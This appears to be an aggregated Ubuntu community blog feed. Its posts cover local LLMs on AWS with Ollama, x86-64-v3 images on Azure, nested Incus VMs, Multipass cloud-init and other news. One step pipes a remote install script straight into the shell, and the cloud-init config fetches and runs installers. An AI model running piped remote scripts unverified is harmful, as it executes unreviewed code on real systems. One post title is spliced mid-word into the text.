March 27, 2024

In our previous post, we discussed how to generate Images using Stable Diffusion on AWS. In this post, we will guide you through running LLMs for text generation in your own environment with a GPU-based instance in simple steps, empowering you to create your own solutions.

Text generation, a trending focus in generative AI, facilitates a broad spectrum of language tasks beyond simple question answering. These tasks include content extraction, summary generation, sentiment analysis, text enhancement (including spelling and grammar correction), code generation, and the creation of intelligent applications like chatbots and assistants.

In this tutorial, we will demonstrate how to deploy two prominent large language models (LLM) on a GPU-based EC2 instance on AWS (G4dn) using Ollama, an open source tool for downloading, managing, and serving LLM models. Before getting started, ensure you have completed our technical guide for installing NVIDIA drivers with CUDA on a G4DN instance.

We will utilize Llama2 and Mistral, both strong contenders in the LLM space with open source licenses suitable for this demo.

While we won’t explore the technical details of these models, it is worth noting that Mistral has shown impressive results despite its relatively small size (7 billion parameters fitting into an 8GB VRAM GPU). Conversely, Llama2 provides a range of models for various tasks, all available under open source licenses, making it well-suited for this tutorial. 

To experiment with question-answer models similar to ChatGPT, we will utilize the fine-tuned versions optimized for chat or instruction (Mistral-instruct and Llama2-chat), as the base models are primarily designed for text completion.

Let’s get started!

Step 1: Installing Ollama

To begin, open an SSH session to your G4DN server and verify the presence of NVIDIA drivers and CUDA by running:

nvidia-smi

Keep in mind that you need to have the SSH port open, the key-pair created or assigned to the machine during creation, the external IP of the machine, and software like ssh for Linux or PuTTY for Windows to connect to the server.

If the drivers are not installed, refer to our technical guide on installing NVIDIA drivers with CUDA on a G4DN instance.

Once you have confirmed the GPU drivers and CUDA are set up, proceed to install Ollama. You can opt for a quick installation using their binary, or choose to clone the repository for a manual installation.

To install Ollama quickly, run the following command

curl -fsSL https://ollama.com/install.sh | sh

Step 2: Running LLMs on Ollama

Let’s start with Mistral models and view the results by running:

ollama run mistral

This instruction will download the Mistral model (4.1GB) and serve it, providing a prompt for immediate interaction with the model.

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/fl-CU72xnqdUmIlstlbC16YA561D2EZfK714dc4MvntLxCtX_EacdmKgav4K4JitGJQ7LMXY_96A2r1eytxylAQb6A_imPxLxGuQ4x0TKzIhIc_wp2loejq6ZtIDw0POP0mnCvipQn2QrnwFN3Ke50s" width="720" /> </noscript>

Not a bad response for a prompt written in Spanish!. Now let’s experiment with a prompt to write code:

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/qsCzgWB_Oa5jI9aiQeSQw3Y3AM6vwtp-pH5ZPGUHuLlDutELXtz10q2CVcUD5UfUQFGanO1dVesVpPBVNyWTZoA1mtGrd4Bc5S1D5KGIx40niOpZBTd1b6dYCWdVSWc2jsoBwKcpdzK-olGLNV8FnUw" width="720" /> </noscript>

Impressive indeed. The response is not only generated rapidly, but the code also runs flawlessly, with basic error handling and explanations. (Here’s a pro tip: consider asking for code comments, docstrings, and even test functions to be incorporated into the code). 

Exit with the /bye command.

Now, let’s enter the same prompt with Llama2.

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/khde_aa7oD1YCNZCqHfr3BImnx9DljC6LRQWYsY-h2QQqB1X-biwirAHc5UXKqvBbGj6IkMVGxIgJBgkg2G2zNuAmGFy6yiqJktNFV3noMky-lDdpV9fK0Hi3rKVPuCEU-2EU5JO_aogYR4rm5atr_U" width="720" /> </noscript>

We can see that there are immediate, notable differences. This may be due to the training data it has encountered, as it defaulted to a playful and informal chat-style response. 

Let’s try Llama2 using the same code prompt from above:

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/EJbcqAPT0KnCLdhkEHAYyV-GoQF9tFq7HD6oUW9bL1jdXRhK6ePMpBzsya-riGc-oUuU6YJnju8p6rENuvAvWwdFhXW1DHguSIepqoUyhEs53_J6ErA1MYZQ4chicB4NQ4yYcbVTzK7xIe2YtLlklxE" width="720" /> </noscript>

The results of this prompt are quite interesting. Following four separate tests, it was clear that the generated responses had not only broken code but also inconsistencies within the responses themselves. It appears that writing code is not one of the out-of-the-box capabilities of Llama2 in this variant (7b parameters, although there are also versions specialized in code like Code-Llama2), but results may vary.

Let’s run a final test with Code-Llama, a Llama model fine-tuned to create and explain code:

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/Pb-OFsqzSSwjNvwjRvunNOOVom24QlKI0Qj7AUbI99DuDAkseozB907EB6Q7UCwBJKjq-Qkj7a470lG6d30cKCvJYjJsnKvurJ0HxhJLcT2C77Vu3ceqW9-FBmqgBiTa9ndMrxHh0sjlw3c4SoenBIw" width="720" /> </noscript>

We will use the same prompt from above to write the code:

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/rjAusR9z9VY8UZ5qHbJpaGVBMKgMvf7uLlunmtarEJRUbyL7ZyHnx_EUyRzSYJKeLrD8wPqz0VURJY28lyusU3Q9MBZFrxWUBWYa6TUQXw-Qg0uqSz2x8vEv52RDsykWMbr5WC7VNbiBZM_0OGiRO-o" width="720" /> </noscript>

This time, the response is improved, with the code functioning properly and a satisfactory explanation provided.

You now have the option to either continue exploring directly through this interface or start developing apps using the API.

Final test: A chat-like web interface

We now have something ready for immediate use. However,  for some added fun, let’s install a chat-like web interface to mimic the experience of ChatGPT.

For this test, we are going to use ollama-ui (https://github.com/ollama-ui/ollama-ui). 

⚠︎ Please note that this project is no longer being maintained and users should transition to Open WebUI, but for the sake of simplicity, we are going to still use the Ollama-ui front-end.

In your terminal window, clone the ollama-ui repository by entering the following command:

git clone https://github.com/ollama-ui/ollama-ui

Here’s a cool trick: when you run Ollama, it creates an API endpoint on port 11434. However, Ollama-ui will run and be accessible on port 8000, thus, we’ll need to ensure both ports are securely accessible from our machine.

Since we are currently running as a development service (without the security features and performance of a production web server), we will establish an SSH tunnel for both ports. This setup will enable us to access these ports exclusively from our local computer with encrypted communication (SSL).

To create the tunnel for both the web-ui and the model’s API, close your current SSH session and open a new one with the following command:

ssh -L 8000:localhost:8000 -L 11434:127.0.0.1:11434 -i myKeyPair.pem ubuntu@<Machine_IP>

Once the tunnel is set up, navigate to the ollama-ui directory in a new terminal and run the following command:

cd ollama-ui
make

Next, open your local browser and go to 127.0.0.1:8000 to enjoy the chat web inRunning an LLM model for text generation on Ubuntu on AWS with a GPU instanceterface!

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/uLI_zjL4X2QaaMudOr0_orYlhCqA3zgIGqrvJ5v4QDeiKKy2Yp6TjMDRB189jPNwLJjWBtLUcYWLgdlSiEpvwNkJr9jxmF0sfTpf4Y_nhx6QsNcQPmgs0resb2PtE6kN591MkQ1dN-1O2cKLyO9NLnQ" width="720" /> </noscript>

While the interface is simple, it enables dynamic model switching, supports multiple chat sessions, and facilitates interaction beyond reliance on the terminal (aside from tunneling). This offers an alternative method for testing the models and your prompts.

Final thoughts

Thanks to Ollama and how simple it is to install the NVIDIA drivers on a GPU-based instance, we got a very straightforward process for running LLMs for text generation in your own environment. Additionally, Ollama facilitates the creation of custom model versions and fine-tuning, which is invaluable for developing and testing LLM-based solutions.

When selecting the appropriate model for your specific use case, it is crucial to evaluate their capabilities based on architectures and the data they have been trained on. Be sure to explore fine-tuned variants such as Llama2 for code, as well as specialized versions tailored for generating Python code.

Lastly, for those aiming to develop production-ready applications, remember to review the model license and plan for scalability, as a single GPU server may not suffice for multiple concurrent users. You may want to explore Amazon Bedrock, which offers easy access to various versions of these models through a simple API call or Canonical MLOps, an end-to-end solution for training and running your own ML models.

Quick note regarding the model size

The size of the model significantly impacts the production of better results. A larger model is more capable of reproducing better content (since it has a greater capacity to “learn”). Additionally, larger models offer a larger attention window (for “understanding” the context of the question), and allow more tokens as input (your instructions) and output (the response)

As an example, Llama2 offers three main model sizes regarding the parameter number: 7, 13, or 70 billion parameters. The first model requires a GPU with a minimum of 8GB of GPU RAM, whereas the second requires a minimum of 16GB of VRAM.

Let me share a final example:

I will request the 7B parameters version of Llama2 to proofread an incorrect version of this simple Spanish phrase, “¿Hola, cómo estás?”, which translates to “Hi, how are you?” in English. 

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/_ZKYLr9y74wKnd7ZXOIHEL_zOkWwzXkcVT6EIl_Dk7HCLlnATlU4HiEkRCfK8mOFcA-vtJzN1fEsXSqHgw2K9yXGau7S0DyMXonaNKQb5JldqLletBvoPjBpdB884cipxBer-QSm1kcsdq7cVGyV4DQ" width="720" /> </noscript>

I conducted numerous tests, all yielding incorrect results like the one displayed in the screenshot (where “óle” is not a valid word, and it erroneously suggests it means “hello”).

Now, let’s test the same example with Llama2 with 13 billion parameters:

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/efiibK2R508IFhdRykchQzoN2C5ysEdtQsf28yovi_cZNqdF1MXVHzOdJWx2DEAwsbv423AolmzmtqsjaerdE4DlWbnIqUzfdUts9wPM84-34UGni_7CZFtCKKq2QWpCNJjQn5i44qbn8J8TwTO3v6c" width="720" /> </noscript>

While it failed to recognize that I intended to write “hola,” this outcome is significantly better as it added accents, question marks and detected that “ola” wasn’t the right word to use (if you are curious, it means “wave”) .

on March 27, 2024 03:09 PM

Ubuntu 23.10 experimental image with x86-64-v3 instruction set now available on Azure

Canonical is enabling enterprises to evaluate the performance of their most critical workloads in an experimental Ubuntu image on Azure compiled with x86-64-v3, which is a microarchitecture level that has the potential for performance gains. Developers can use this image to characterise workloads, which can help inform planning for a transition to x86-64-v3 and provide valuable input to the community working to make widespread adoption of x86-64-v3 a reality. 

The x86-64-v3 instruction set enables hardware features that have been added by chip vendors since the original instruction set architecture (ISA) commonly known as x86-64-v1, x86-64, or amd64.  Canonical Staff Engineer Michael Hudson-Doyle recently wrote about the history of the x86-64/amd64 instruction sets, what these v1 and v3 microarchitecture levels represent, and how Canonical is evaluating their performance. While fully backwards compatible, later versions of these feature groups are not available on all hardware, so when deciding on an ISA image you must choose to maximise the supported hardware or to get access to more recent hardware capabilities. Canonical plans to continue supporting x86-64-v1 as there is a significant amount of legacy hardware deployed in the field. However, we also want to enable users to take advantage of newer x86-64-v3 hardware features that provide the opportunity for performance improvements the industry isn’t yet capitalising on. 

Untapped performance and power benefits

Intel and Canonical partner closely to ensure that Ubuntu takes full advantage of the advanced hardware features Intel silicon offers, and the Ubuntu image on Azure is an interim step towards giving the industry access to the capabilities of x86-64-v3 and understanding the benefits that it offers. Intel has made x86-64-v3 available since Intel Haswell was first announced a decade ago. Support in their low power processor family is more recent, arriving in the Gracemont microarchitecture which was first in the 12th generation of Intel Core processors. Similarly, AMD has had examples since 2015, and emulators such as QEMU have supported  x86-64-v3 since 2022. Yet, with this broad base of hardware availability, distro support of the features in the x86-64-v3 microarchitecture level is not widespread. In the spirit of enabling Ubuntu everywhere and ensuring that users can benefit from the unique features on different hardware families, Canonical feels strongly about enabling a transition to x86-64-v3 while remaining committed to our many users on hardware that doesn’t support v3. x86-64-v3 is available in a significant amount of hardware, and provides the opportunity for performance improvements which are currently being left on the table. This is why we believe that v3 is the next logical microarchitecture level to offer in Ubuntu, and Michael’s blog post explains in greater detail why v3 should be chosen instead of v2 or v4.

Not just a porting exercise

The challenge with enabling the transition to v3 is that while we expect a broad range of performance improvements depending on the workload, the results are much more nuanced. From Canonical’s early benchmarking we see that certain workloads see significant benefit from the adoption of x86-64-v3; however there are outliers that regress and need further analysis.

Canonical continues to do benchmarking, with plans to evaluate different compilers, compiler parameters, and configurations of hostOS and guestOS. In certain cases, such as the Glibc Log2 benchmark, we have reproducibly seen up to a 60% improvement. On the other hand, we also see other benchmarks  that regress significantly. When digging in, we found unexpected behaviour in the compiled code. For example, in one of the benchmarks we verified an excessive number of moves between registers, leading to much worse performance due to the increased latency. In another situation, we noticed a large code size increase, as enabling x86-64-v3 on optimised SSE code caused the compiler to expand it into 17x more instructions, due to a possible bug during the translation to VEX encoding. With community efforts, these outliers  could be resolved.  However, they will require interdisciplinary collaboration to do so. This also underscores the necessity of benchmarking different types of workloads, so that we can understand their specific performance and bottlenecks. That’s why we believe it’s important to enable workloads to run on Azure, so that a broader community can give feedback and enable further optimisation.

Try Ubuntu 23.10 with x86-64-v3 on Azure today

The community now has access to resources on Azure to easily evaluate the performance of x86-64-v3 for their workloads, so that they can understand the benefits of migrating and can identify where improvements are still required.  What is being shared today is experimental and for evaluation and benchmarking purposes only, which means that it won’t receive security updates or other maintenance updates you would expect for an image you could use in production. When x86-64-v3 is introduced for production workloads there will be a benefit to being able to run both v3 and v1 depending on the workload and hardware available. As is usually the case, the answer to the question of whether to run on a v3 image or a v1 image is ‘it depends’. This image provides the tools to answer that cost, power, and performance optimisation problem. In addition to the availability of the cloud image on Azure, we’ve also previously posted on the availability of Ubuntu 23.04 rebuilt to target the x86-64-v3 microarchitecture level, and made available installer images from that archive. These are additional tools that the community can use to benchmark, when cloud environments can’t be targeted.

In order to access the image on Azure and use it, you can follow the instructions in our discourse post. Please be sure to leave your feedback there, or Contact us directly to discuss your use case.

Further reading

on March 27, 2024 02:04 PM

Incus is a manager for virtual machines (VM) and system containers. There is also an Incus support forum.

A virtual machine (VM) is an instance of an operating system that runs on a computer, along with the main operating system. A virtual machine uses hardware virtualization features for the separation from the main operating system. With virtual machines, the full operating system boots up in them.

A system container is an instance of an operating system that also runs on a computer, along with the main operating system. A system container, instead, uses security primitives of the Linux kernel for the separation from the main operating system. You can think of system containers as software virtual machines. System containers reuse the running Linux kernel of the host, therefore you can only have Linux system containers, any Linux distribution.

In this post we see how to create a VM with Incus, install Incus into that VM, and then create a VM through the inner Incus installation. This is also called nested virtualization. Incus works fine with nested virtualization. Any pitfalls arise from the settings of the host (BIOS/UEFI settings, host Linux kernel, etc). We’ll see these together, step by step.

Table of Contents

Configuring your hardware for virtualization

You would need to enter into the BIOS/UEFI settings and enable the option for VT-x (for Intel CPUs) or AMD-V (for AMD CPUs) virtualization. If you are unsure, you can just follow the instructions in the next step which will complain if you have not enabled the appropriate BIOS/UEFI settings.

As a sidenote there is another setting, Intel VT-d (for Intel CPUs) or AMD-Vi (for AMD CPUs) that allow to move a supported hardware device (like a GPU, if you have more than one) into the VM. Not essential for what we are testing, but keep that in mind if you get too deep into virtualization.

There are also some additional options that are optional, AMD Nested Page tables (NPT) (for AMD) and Rapid Virtualization Indexing (RVI)/Intel Extended Page Tables (EPT) for Intel. These help for performance.

Testing your host for virtualization

The Linux kernel that is available in most Linux distributions supports the KVM hypervisor for virtualization.

Applications use the libvirttoolkit to access the virtualization features.

In order to test if our host supports virtualization, we install cpu-checker and the libvirt-clients packages on the host and then run kvm-ok and virt-host-validate respectively to verify our system. Compared between the two utilities, the latter is better. However, I am including cpu-checkeras it is covered in lots of documentation.

$ sudo apt install -y cpu-checker libvirt-clients
...
$ kvm-ok
INFO: /dev/kvm exists
KVM acceleration can be used
$ sudo virt-host-validate
  QEMU: Checking for hardware virtualization                                 : PASS
  QEMU: Checking if device /dev/kvm exists                                   : PASS
  QEMU: Checking if device /dev/kvm is accessible                            : PASS
  QEMU: Checking if device /dev/vhost-net exists                             : PASS
  QEMU: Checking if device /dev/net/tun exists                               : PASS
  QEMU: Checking for cgroup 'cpu' controller support                         : PASS
  QEMU: Checking for cgroup 'cpuacct' controller support                     : PASS
  QEMU: Checking for cgroup 'cpuset' controller support                      : PASS
  QEMU: Checking for cgroup 'memory' controller support                      : PASS
  QEMU: Checking for cgroup 'devices' controller support                     : PASS
  QEMU: Checking for cgroup 'blkio' controller support                       : PASS
  QEMU: Checking for device assignment IOMMU support                         : PASS
  QEMU: Checking if IOMMU is enabled by kernel                               : PASS
  QEMU: Checking for secure guest support                                    : WARN (Unknown if this platform has Secure Guest support)
   LXC: Checking for Linux >= 2.6.26                                         : PASS
   LXC: Checking for namespace ipc                                           : PASS
   LXC: Checking for namespace mnt                                           : PASS
   LXC: Checking for namespace pid                                           : PASS
   LXC: Checking for namespace uts                                           : PASS
   LXC: Checking for namespace net                                           : PASS
   LXC: Checking for namespace user                                          : PASS
   LXC: Checking for cgroup 'cpu' controller support                         : PASS
   LXC: Checking for cgroup 'cpuacct' controller support                     : PASS
   LXC: Checking for cgroup 'cpuset' controller support                      : PASS
   LXC: Checking for cgroup 'memory' controller support                      : PASS
   LXC: Checking for cgroup 'devices' controller support                     : PASS
   LXC: Checking for cgroup 'freezer' controller support                     : FAIL (Enable 'freezer' in kernel Kconfig file or mount/enable cgroup controller in your system)
   LXC: Checking for cgroup 'blkio' controller support                       : PASS
   LXC: Checking if device /sys/fs/fuse/connections exists                   : PASS
$ 

If you get a failure, try to identify whether the issue is with your computer’s firmware or with the Linux kernel of your host. If in doubt, post below the output.

Why does the output mention both QEMU and LXC? By default, the command shows all libvirt virtualization support, unless you specify something specific. If you wanted only the QEMU output, you would run sudo virt-host-validate qemu. Note that the LXC here is not the Linux Containers LXC. The LXC above is the Libvirt LXC.

Testing your host for nested virtualization

I have not noticed any mention for nested virtualization in the output of virt-host-validate. If you know a tool that shows that information, write it in the comments. In the absence of such a tool, let’s check manually.

If you have an AMD CPU, run the following. If you get 1, then nested virtualization through KVM works.

$ cat /sys/module/kvm_amd/parameters/nested 
1
$ 

If instead you have an Intel CPU, run the following. If you get Y(instead of 1), then nested virtualization through KVM works.

$ cat /sys/module/kvm_intel/parameters/nested
Y
$ 

If instead you get an error (such as the following), then something is wrong. Report back your CPU model and motherboard, along with the Linux kernel version and Linux distribution.

cat: /sys/module/kvm_intel/parameters/nested: No such file or directory

Launching the outer Incus VM

We launch the outer VM. Get a shell into the outer VM, install Incus and those utilities that show whether KVM virtualization works. Then, we launch an Alpine VM in the outer VM. We get an error regarding Secure Boot (the Alpine Linux kernel is not signed), remove the stuck VM and launch again with Secure Boot disabled. Finally, we get a shell into the inner VM.

$ incus launch images:debian/12 outervm --vm
Launching outervm
$ incus shell outervm
root@outervm:~#

      # Install Incus according to the documentation.

root@outervm:~# sudo apt install -y cpu-checker libvirt-clients
...
root@outervm:~# virt-host-validate 
  QEMU: Checking for hardware virtualization                                 : PASS
  QEMU: Checking if device /dev/kvm exists                                   : PASS
  QEMU: Checking if device /dev/kvm is accessible                            : PASS
  QEMU: Checking if device /dev/vhost-net exists                             : PASS
  QEMU: Checking if device /dev/net/tun exists                               : PASS
...
root@outervm:~# incus launch images:alpine/edge innervm --vm
Launching innervm
Error: Failed instance creation: The image used by this instance is incompatible with secureboot. Please set security.secureboot=false on the instance
root@outervm:~# incus delete innervm
root@outervm:~# incus launch images:alpine/edge innervm --vm --config security.secureboot=false
Launching innervm
root@outervm:~# incus list -c ns4t
+---------+---------+-----------------------+-----------------+
|  NAME   |  STATE  |         IPV4          |      TYPE       |
+---------+---------+-----------------------+-----------------+
| innervm | RUNNING | 10.227.169.165 (eth0) | VIRTUAL-MACHINE |
+---------+---------+-----------------------+-----------------+
root@outervm:~# uname -a
Linux outervm 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
root@outervm:~# incus shell innervm
innervm:~# uname -a
Linux innervm 6.6.22-1-virt #2-Alpine SMP PREEMPT_DYNAMIC Thu, 14 Mar 2024 02:12:52 +0000 x86_64 Linux
innervm:~# 

Conclusion

We saw how to verify whether our host is able to work with hardware virtualization. This involves checking both the computer firmware settings (BIOS/UEFI) and the host Linux kernel.

Then, we created an outer VM with Incus, got a shell into there, installed Incus, and launched an inner (nested) VM.

I wonder whether we can go further and create a VM inside the inner VM. If you go through these and try to create an inner inner VM, post the error message. It does not feel like it should be possible.

on March 27, 2024 01:40 PM

March 26, 2024

Announcing Incus 0.7

Stéphane Graber

The last Incus release before we go LTS has now been released!

This is quite the feature packed release as this is meant to include just about every features we want in Incus 6.0 LTS except for a few last minute minor additions.

You’ll find new features for just about everyone, from multi-cluster networking with the new network integrations, to enhanced performance on multi-socket servers with the improved NUMA support, to easier authentication with JSON Web Token support, to I/O limits for virtual machines and more USB passthrough options.

The full announcement and changelog can be found here.
And for those who prefer videos, here’s the release overview video:

You can take the latest release of Incus up for a spin through our online demo service at: https://linuxcontainers.org/incus/try-it/

And as always, my company is offering commercial support on Incus, ranging from by-the-hour support contracts to one-off services on things like initial migration from LXD, review of your deployment to squeeze the most out of Incus or even feature sponsorship. You’ll find all details of that here: https://zabbly.com/incus

Donations towards my work on this and other open source projects is also always appreciated, you can find me on Github Sponsors, Patreon and Ko-fi.

Enjoy!

on March 26, 2024 10:42 PM

March 25, 2024

Welcome to the Ubuntu Weekly Newsletter, Issue 832 for the week of March 17 – 23, 2024. The full version of this issue is available here.

In this issue we cover:

  • Ubuntu Stats
  • Hot in Support
  • FLISoL San José de Pare – El primer FLISoL del año en Colombia
  • LoCo Events
  • March 8, Women’s Day – Marzo 8, Día Internacional de la Mujer – Bogotá, Colombia
  • Ubuntu Studio: Wallpaper Competition Winners 24.04 LTS
  • Ubuntu Cloud News
  • Canonical News
  • In the Blogosphere
  • Other Articles of Interest
  • Featured Audio and Video
  • Meeting Reports
  • Upcoming Meetings and Events
  • Updates and Security for Ubuntu 20.04, 22.04, and 23.10
  • And much more!

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

.

on March 25, 2024 10:04 PM

March 24, 2024

The Matrix has you, part 2

Stuart Langridge

I’ve recently switched back from vscode to Sublime Text, which means that after all the time I spent training my fingers to type “code somefile.txt” instead of “subl somefile.txt” I now need to undo all that conditioning and go back to subl again. So I thought, hey, maybe I should dump a little shell script called code in my bin folder which admonished me in some amusing way, thus Pavlov-ing myself into learning to do it right.

And then I thought, hey, what’d be cool is if I had that Matrix-esque “raining code” effect in the Terminal and then it was superimposed with a box saying “STOP TYPING code AND USE subl INSTEAD”, like the “SYSTEM ERROR” message at the end of the first movie.

And then I thought: someone’s already done this, right? And they have; it is called cmatrix. But I don’t like cmatrix because it doesn’t do the colours right; the text just sorta stops rather than fading away like the movie does, and it feels unreal and too sharp for me. Now, don’t get me wrong, I understand why this is; terminals support a full proper range of colour these days, but writing a program which gets released to actual people and which can deal with the bewildering array of terminal settings out there is a miserable waste of everyone’s time. But I’m not writing this for anyone else; it only has to work in my terminal (in true works on my machine fashion). And this will give me a chance to noodle about with Python terminal libraries such as blessed to make something interesting. Hence, matrix24.py:

It’s a bodge all round, and it still doesn’t look right, and Jess pointed out that making something cool happen when I make a mistake is the opposite of conditioning, but I got to fiddle about with a new library for a bit, so that was fun. Can I do something productive now?

(title from a classic post about the Matrix which still makes me laugh even after all these years, although it is very unfair to Keanu Reeves who is a cool bloke and should be emulated in his approach to life)

on March 24, 2024 03:40 PM

Multipass cloud-init

Dougie Richardson

Multipass is pretty useful but what a pain this was to figure out, due to Ubuntu’s Node.js package not working with AWS-CDK.

Multipass lets you manage VM in Ubuntu and can take cloud-init scripts as a parameter. I wanted an Ubuntu LTS instance with AWS CDK, which needs Node.js and python3-venv.

#cloud-config
packages:
  - python3-venv
  - unzip

package_update: true

package_upgrade: true

write_files:
  - path: "/etc/environment"
    append: true
    content: |
      export PATH=\
      /opt/node-v20.11.1-linux-x64/bin:\
      /usr/local/sbin:/usr/local/bin:\
      /usr/sbin:/usr/bin:/sbin:/bin:\
      /usr/games:/usr/local/games:\
      /snap/bin

runcmd:
  - wget https://nodejs.org/dist/v20.11.1/node-v20.11.1-linux-x64.tar.xz 
  - tar xvf node-v20.11.1-linux-x64.tar.xz -C /opt
  - export PATH=/opt/node-v20.11.1-linux-x64/bin:$PATH
  - npm install -g npm@latest
  - npm install -g aws-cdk
  - git config --system user.name "Dougie Richardson"
  - git config --system user.email "xx@xxxxxxxxx.com"
  - git config --system init.defaultBranch main
  - wget https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip
  - unzip awscli-exe-linux-x86_64.zip
  - ./aws/install

Save that as cdk.yaml and spin up an new instance:

multipass launch --name cdk --cloud-init cdk.yaml
Success!

There’s a couple useful things to note if you’re checking this out:

  • Inside the VM there’s a useful log to assist debugging /var/log/cloud-init-output.log.
  • While YAML has lots of ways to split text over multiple lines, when you don’t want space use a backslash.

Shell into the new VM with multipass shell cdk, then we can configure programmatic access and bootstrap CDK.

aws sso configure
aws sso login --profile profile_name
aws sts get-caller-identity --profile profile_name
aws configure get region --profile profile_name

The last two commands give the account and region to bootstrap:

cdk bootstrap aws://account_number/region --profile profile_name
on March 24, 2024 01:30 PM

March 22, 2024

We are excited to announce a call for submissions for the official desktop wallpaper of Kubuntu 24.04! This is a fantastic opportunity for artists, designers, and Kubuntu enthusiasts to showcase their talent and contribute to the visual identity of the upcoming Kubuntu release.

What We’re Looking For

We are in search of unique, inspiring, and beautiful wallpapers that reflect the spirit of Kubuntu and its community. Your design should captivate users with its creativity, while also embodying the essence of Kubuntu’s commitment to freedom, elegance, and technical excellence.

Submission Guidelines

Resolution: Submissions must be at least 3840×2160 pixels to ensure high quality on all displays.

**Format: **JPEG or PNG format is preferred.

Original Work: Your submission must be your original work and not include any copyrighted material unless you have permission to use it.

Theme: While we encourage creativity, your design should be suitable for a wide audience and align with the values and aesthetics of the Kubuntu community.

How to Submit

Please send your wallpaper submissions to Rick Timmis of the Kubuntu Council, via one of:

Deadline

The deadline for submissions is March 31, 2024. We will review all submissions and select the design(s) to be included as part of the Kubuntu 24.04 release. The selected artist(s) will receive credit in the release notes and across our social media platforms, showcasing your contribution to users worldwide.

Let Your Creativity Shine

This is your chance to leave a mark on the Kubuntu community and be a part of the journey towards an exciting new release. We can’t wait to see your submissions and the diverse interpretations of what Kubuntu represents to you.

Embrace this opportunity to let your creativity shine and help make Kubuntu 24.04 the most visually stunning release yet. Good luck to all participants!

on March 22, 2024 08:19 AM

March 21, 2024

A Crowning Achievement

As 24.04 LTS will represent the eighth Long-Term Support release of Ubuntu Studio and its 32nd release. For this release, we wanted to make sure we got some great representation from the community in terms of wallpaper, and while there weren’t as many entries as our previous competition, we were blown out of the way in terms of quality. While not every wallpaper could be included, all of the entries were solid, and narrowing it down to the best of the best was very difficult.

Revealing The Default

Our long-time art lead, Eylul Dogruel, worked diligently on making a quality textured default wallpaper that not only works well for traditional horizontal screens, but for vertical screens as well without losing quality. We have two variations: one with our logo, and one with the mascot that will be rotated-out for the next four releases.

Now to Crown the Winners!

As stated, this was a very difficult decision, but we would like to congratulate the winners of the competition! The full-quality images will be included in Ubuntu Studio 24.04 LTS and are already in our daily builds of Noble Numbat.

Interference by Uday Nakade
Glass Wave 1 Light by Alastair Temple
Bee 2 by Liber Dovat
Brauneck Sunrise by Uday Nakade
Banaue by Jean-Daniel Bancal
on March 21, 2024 09:22 PM

E291 Santo Seppuku

Podcast Ubuntu Portugal

Watashitachi no komyuniti wa kyōryokudesu! O Diogo errou e os seus antepassados exigem que ele lave a honra do podcast. Agora sim, este país vai para a frente, agora que a PC Guia lançou uma pen com distribuições GNU-Linux para educar o povo! A ANSOL conquista cada vez mais terreno nos media, a sua assembleia geral foi repleta de aplausos, desfiles e bandeirinhas e o software livre marcha em direcção aos amanhãs que cantam! Entretanto, o Miguel não gosta de bancos; a Canonical continua a ter problemas com aplicações de criptomoedas; o Firefox está cheio de coisinhas boas e vem aí o Ubuntu 24.04 LTS com belos fundos de ecrã!

Já sabem: oiçam, subscrevam e partilhem!

Apoios

Podem apoiar o podcast usando os links de afiliados do Humble Bundle, porque ao usarem esses links para fazer uma compra, uma parte do valor que pagam reverte a favor do Podcast Ubuntu Portugal. E podem obter tudo isso com 15 dólares ou diferentes partes dependendo de pagarem 1, ou 8. Achamos que isto vale bem mais do que 15 dólares, pelo que se puderem paguem mais um pouco mais visto que têm a opção de pagar o quanto quiserem. Se estiverem interessados em outros bundles não listados nas notas usem o link https://www.humblebundle.com/?partner=PUP e vão estar também a apoiar-nos.

Atribuição e licenças

Este episódio foi produzido por Diogo Constantino, Miguel e Tiago Carrondo e editado pelo Senhor Podcast. O website é produzido por Tiago Carrondo e o código aberto está licenciado nos termos da Licença MIT. A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da CC0 1.0 Universal License. Este episódio e a imagem utilizada estão licenciados nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.

on March 21, 2024 12:00 AM

March 19, 2024

On Mastodon, the question came up of how Ubuntu would deal with something like the npm install everything situation. I replied:

Ubuntu is curated, so it probably wouldn’t get this far. If it did, then the worst case is that it would get in the way of CI allowing other packages to be removed (again from a curated system, so people are used to removal not being self-service); but the release team would have no hesitation in removing a package like this to fix that, and it certainly wouldn’t cause this amount of angst.

If you did this in a PPA, then I can’t think of any particular negative effects.

OK, if you added lots of build-dependencies (as well as run-time dependencies) then you might be able to take out a builder. But Launchpad builders already run arbitrary user-submitted code by design and are therefore very carefully sandboxed and treated as ephemeral, so this is hardly novel.

